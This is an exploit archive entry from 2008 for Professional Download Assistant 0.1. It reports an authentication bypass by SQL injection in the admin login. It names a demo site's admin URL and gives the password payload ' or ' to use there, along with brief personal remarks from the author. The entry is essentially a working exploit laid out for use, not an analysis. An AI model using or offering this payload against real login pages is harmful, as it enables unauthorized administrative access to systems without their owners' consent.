id: 4392
date: 12/09/2008
title: Professional Download Assistant 0.1 (Auth Bypass) SQL Injection Vuln
author: ZoRLu
cves: 

====================================================================
Professional Download Assistant 0.1 (Auth Bypass) SQL Injection Vuln
====================================================================


[~] Professional Download Assistant 0.1 Bypass
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu  
[~]
[~] Date: 08/12/2008
[~]
[~] N0T: TUM iSLAM ALEMiNiN BAYRAMINI KUTLARIM...!
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------

exp for demo: 

http://www.dotnetindex.com/demos/prodownloadmanager/admin/

user: ZoRLu

passwd: ' or '

[~]----------------------------------------------------------------------



#  0day.today [2023-03-24]  #